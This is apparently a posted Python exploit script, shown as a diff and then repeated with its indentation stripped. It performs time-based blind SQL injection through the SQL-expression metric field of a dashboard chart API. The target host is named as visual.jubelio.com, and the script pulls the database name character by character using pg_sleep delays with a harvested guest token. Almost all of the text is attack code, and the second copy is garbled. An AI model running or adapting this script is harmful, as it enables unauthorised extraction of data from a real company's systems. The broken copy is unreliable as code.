sharpicx · May 14, 2025 23:36
diff --git a/a.py b/a.py
 import requests
 import json
 import string
 import copy
 import time
 import os

 printable_chars = list(map(ord, string.printable)) + [0]
 dashboard_token = None
 extracted = ''

 default_time = 2
 patokan_karakter = 1

 def getSetToken():
    global dashboard_token
    url = "https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxx/v1/xxxxxxxx/xxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx"
    headers = {
        "Host": "xxxxxxxxxxxxxxxxxxxxxx
        "Sec-Ch-Ua-Platform": '"macOS"',
        "Authorization": "Bearer xxxxxxxxxxxxx",
        "Accept-Language": "en-US,en;q=0.9",
        "Sec-Ch-Ua": '"Chromium";v="135", "Not-A.Brand";v="8"',
        "Content-Type": "application/json",
        "Sec-Ch-Ua-Mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
        "Accept": "*/*",
        "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
        "Sec-Fetch-Site": "same-site",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/",
        "Priority": "u=1, i"
    }
    payload = {}
    try:
        response = requests.post(url, headers=headers, json=payload)
        if response.status_code == 200:
            try:
                response_data = response.json()
                dashboard_token = response_data.get("data", {}).get("dashboardToken")
            except json.JSONDecodeError as e:
                print(e)
            except requests.exceptions.RequestException as e:
                print(e)
    except requests.exceptions.RequestException as e:
        print(e)

 def doExtraction():
    global dashboard_token, default_time, patokan_karakter, extracted
    base_url = "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx" 
    query_params = {
        "form_data": json.dumps({"slice_id": 241}),
        "dashboard_id": "40",
        "force": None
    }
    headers = {
        "Host": "visual.jubelio.com",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0",
        "Accept": "application/json",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx",
        "X-Csrftoken": "",
        "X-Guesttoken": dashboard_token,
        "Content-Type": "application/json",
        "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "same-origin",
        "Sec-Fetch-Site": "same-origin",
    }
    template = {
        "datasource":{"id":50,"type":"table"},
        "force":False,
        "queries":[{
            "filters":[{"col":"transaction_date","op":"TEMPORAL_RANGE","val":"No filter"},{"col":"doc_type","op":"==","val":"INV"}],
            "extras":{"having":"","where":""},
            "applied_time_extras":{},
            "columns":[],
            "metrics":[{
                "aggregate":None,
                "column":None,
                "datasourceWarning":True,
                "expressionType":"SQL",
                "hasCustomLabel":True,
                "label":"total_penjualan",
                "optionName":"metric_26ts8mn0vq5_t0crgans0e",
                "sqlExpression":""
            }],
            "orderby":[[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"},False]],
            "annotation_layers":[],
            "row_limit":10000,
            "series_limit":0,
            "order_desc":True,
            "url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"},
            "custom_params":{},
            "custom_form_data":{}
        }],
        "form_data":{
            "datasource":"50__table",
            "viz_type":"handlebars",
            "slice_id":241,
            "url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"},
            "query_mode":"aggregate",
            "groupby":[],
            "metrics":[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"}],
            "all_columns":[],
            "percent_metrics":[],
            "order_by_cols":[],
            "order_desc":True,
            "row_limit":10000,
            "server_page_length":10,
            "adhoc_filters":[
                {"clause":"WHERE","comparator":"No filter","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_vztukh6q0g_sq1zlze9z5","isExtra":False,"isNew":False,"operator":"TEMPORAL_RANGE","sqlExpression":None,"subject":"transaction_date"},
                {"clause":"WHERE","comparator":"INV","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_qzite23eqyf_csg3677vtr","isExtra":False,"isNew":False,"operator":"==","operatorId":"EQUALS","sqlExpression":None,"subject":"doc_type"}
            ],
            "handlebarsTemplate":"<center style=\"height:100%;display: flex; align-items: center;\">\n<p style=\"font-size:2vw\">{{formatCurrency data.[0].[total_penjualan] code='IDR' locale=\"id\"}}</p>\n</center>",
            "styleTemplate":"/*\n  .data-list {\n    background-color: yellow;\n  }\n*/\n{{data.[0].[SUM(penjualan)]}}",
            "dashboards":[40],
            "extra_form_data":{},
            "label_colors":{},
            "shared_label_colors":{},
            "color_scheme":"jubelio_v2_dashboard",
            "extra_filters":[],
            "dashboardId":40,
            "force":None,
            "result_format":"json",
            "result_type":"full"
        },
        "result_format":"json",
        "result_type":"full"
    }
    dict_template = copy.deepcopy(template)
    character_found = False
    try:
        while True:
            for char in printable_chars:
                if char == 0:
                    print(f"[!] end of position {patokan_karakter}")
                    raise StopIteratio
                payload = f"(SELECT pg_sleep({default_time}) WHERE ASCII(SUBSTRING(current_database(),{patokan_karakter},1)) = {char})"
                dict_template["queries"][0]["metrics"][0]["sqlExpression"] = payload
                start_time = time.time()
                response = requests.post(base_url, params=query_params, headers=headers, json=dict_template)
                end_time = time.time()
                duration = end_time - start_time
                auth_failures = 0
                if response.status_code in [401, 403]:
                    auth_failures += 1
                    if auth_failures > 5:
                        print("[!] Too many auth failures")
                        os._exit(1337)
                    getSetToken()
                    continue
                print(f"[*] patokan = {patokan_karakter}. [*] karakter hex('{hex(char)}'). [*] karakter ascii('{char}'). [*] takes = {duration:.2f} detik. [*] default_time = {default_time}.")
                if duration >= default_time:
                    if response.status_code == 200:
                        print(f"[+] {patokan_karakter} = '{chr(char)}'")
                        extracted += chr(char)
                        default_time = 2
                        character_found = True
                        patokan_karakter += 1
                        break
                    else:
                        os._exit(1337)
                character_found = False
            if not character_found:
                default_time += 1
                if default_time > 10:
                    print(f"[+] extracted = {extracted}")
                    break
            elif patokan_karakter > 256: 
                print(f"[+] extracted = {extracted}")
                os._exit(1337)
    except requests.exceptions.HTTPError as http_err:
        print(http_err)
        dashboard_token = None
        os._exit(1337)
    except requests.exceptions.RequestException as e:
        print(e)
        dashboard_token = None
        os._exit(1337)
    except json.JSONDecodeError:
        dashboard_token = None
        os._exit(1337)
    finally:
        print(f"[+] extracted = {extracted}")
        os._exit(1337)

 if __name__ == "__main__":
    getSetToken()
    doExtraction()
	import requests
	import json
	import string
	import copy
	import time
	import os

	printable_chars = list(map(ord, string.printable)) + [0]
	dashboard_token = None
	extracted = ''

	default_time = 2
	patokan_karakter = 1

	def getSetToken():
	global dashboard_token
	url = "https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxx/v1/xxxxxxxx/xxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx"
	headers = {
	"Host": "xxxxxxxxxxxxxxxxxxxxxx
	"Sec-Ch-Ua-Platform": '"macOS"',
	"Authorization": "Bearer xxxxxxxxxxxxx",
	"Accept-Language": "en-US,en;q=0.9",
	"Sec-Ch-Ua": '"Chromium";v="135", "Not-A.Brand";v="8"',
	"Content-Type": "application/json",
	"Sec-Ch-Ua-Mobile": "?0",
	"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
	"Accept": "/",
	"Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
	"Sec-Fetch-Site": "same-site",
	"Sec-Fetch-Mode": "cors",
	"Sec-Fetch-Dest": "empty",
	"Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/",
	"Priority": "u=1, i"
	}
	payload = {}
	try:
	response = requests.post(url, headers=headers, json=payload)
	if response.status_code == 200:
	try:
	response_data = response.json()
	dashboard_token = response_data.get("data", {}).get("dashboardToken")
	except json.JSONDecodeError as e:
	print(e)
	except requests.exceptions.RequestException as e:
	print(e)
	except requests.exceptions.RequestException as e:
	print(e)

	def doExtraction():
	global dashboard_token, default_time, patokan_karakter, extracted
	base_url = "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx"
	query_params = {
	"form_data": json.dumps({"slice_id": 241}),
	"dashboard_id": "40",
	"force": None
	}
	headers = {
	"Host": "visual.jubelio.com",
	"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0",
	"Accept": "application/json",
	"Accept-Language": "en-US,en;q=0.5",
	"Accept-Encoding": "gzip, deflate, br",
	"Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx",
	"X-Csrftoken": "",
	"X-Guesttoken": dashboard_token,
	"Content-Type": "application/json",
	"Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
	"Sec-Fetch-Dest": "empty",
	"Sec-Fetch-Mode": "same-origin",
	"Sec-Fetch-Site": "same-origin",
	}
	template = {
	"datasource":{"id":50,"type":"table"},
	"force":False,
	"queries":[{
	"filters":[{"col":"transaction_date","op":"TEMPORAL_RANGE","val":"No filter"},{"col":"doc_type","op":"==","val":"INV"}],
	"extras":{"having":"","where":""},
	"applied_time_extras":{},
	"columns":[],
	"metrics":[{
	"aggregate":None,
	"column":None,
	"datasourceWarning":True,
	"expressionType":"SQL",
	"hasCustomLabel":True,
	"label":"total_penjualan",
	"optionName":"metric_26ts8mn0vq5_t0crgans0e",
	"sqlExpression":""
	}],
	"orderby":[[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"},False]],
	"annotation_layers":[],
	"row_limit":10000,
	"series_limit":0,
	"order_desc":True,
	"url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"},
	"custom_params":{},
	"custom_form_data":{}
	}],
	"form_data":{
	"datasource":"50__table",
	"viz_type":"handlebars",
	"slice_id":241,
	"url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"},
	"query_mode":"aggregate",
	"groupby":[],
	"metrics":[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"}],
	"all_columns":[],
	"percent_metrics":[],
	"order_by_cols":[],
	"order_desc":True,
	"row_limit":10000,
	"server_page_length":10,
	"adhoc_filters":[
	{"clause":"WHERE","comparator":"No filter","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_vztukh6q0g_sq1zlze9z5","isExtra":False,"isNew":False,"operator":"TEMPORAL_RANGE","sqlExpression":None,"subject":"transaction_date"},
	{"clause":"WHERE","comparator":"INV","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_qzite23eqyf_csg3677vtr","isExtra":False,"isNew":False,"operator":"==","operatorId":"EQUALS","sqlExpression":None,"subject":"doc_type"}
	],
	"handlebarsTemplate":"<center style=\"height:100%;display: flex; align-items: center;\">\n<p style=\"font-size:2vw\">{{formatCurrency data.[0].[total_penjualan] code='IDR' locale=\"id\"}}</p>\n</center>",
	"styleTemplate":"/\n .data-list {\n background-color: yellow;\n }\n/\n{{data.[0].[SUM(penjualan)]}}",
	"dashboards":[40],
	"extra_form_data":{},
	"label_colors":{},
	"shared_label_colors":{},
	"color_scheme":"jubelio_v2_dashboard",
	"extra_filters":[],
	"dashboardId":40,
	"force":None,
	"result_format":"json",
	"result_type":"full"
	},
	"result_format":"json",
	"result_type":"full"
	}
	dict_template = copy.deepcopy(template)
	character_found = False
	try:
	while True:
	for char in printable_chars:
	if char == 0:
	print(f"[!] end of position {patokan_karakter}")
	raise StopIteratio
	payload = f"(SELECT pg_sleep({default_time}) WHERE ASCII(SUBSTRING(current_database(),{patokan_karakter},1)) = {char})"
	dict_template["queries"][0]["metrics"][0]["sqlExpression"] = payload
	start_time = time.time()
	response = requests.post(base_url, params=query_params, headers=headers, json=dict_template)
	end_time = time.time()
	duration = end_time - start_time
	auth_failures = 0
	if response.status_code in [401, 403]:
	auth_failures += 1
	if auth_failures > 5:
	print("[!] Too many auth failures")
	os._exit(1337)
	getSetToken()
	continue
	print(f"[] patokan = {patokan_karakter}. [] karakter hex('{hex(char)}'). [] karakter ascii('{char}'). [] takes = {duration:.2f} detik. [*] default_time = {default_time}.")
	if duration >= default_time:
	if response.status_code == 200:
	print(f"[+] {patokan_karakter} = '{chr(char)}'")
	extracted += chr(char)
	default_time = 2
	character_found = True
	patokan_karakter += 1
	break
	else:
	os._exit(1337)
	character_found = False
	if not character_found:
	default_time += 1
	if default_time > 10:
	print(f"[+] extracted = {extracted}")
	break
	elif patokan_karakter > 256:
	print(f"[+] extracted = {extracted}")
	os._exit(1337)
	except requests.exceptions.HTTPError as http_err:
	print(http_err)
	dashboard_token = None
	os._exit(1337)
	except requests.exceptions.RequestException as e:
	print(e)
	dashboard_token = None
	os._exit(1337)
	except json.JSONDecodeError:
	dashboard_token = None
	os._exit(1337)
	finally:
	print(f"[+] extracted = {extracted}")
	os._exit(1337)

	if __name__ == "__main__":
	getSetToken()
	doExtraction()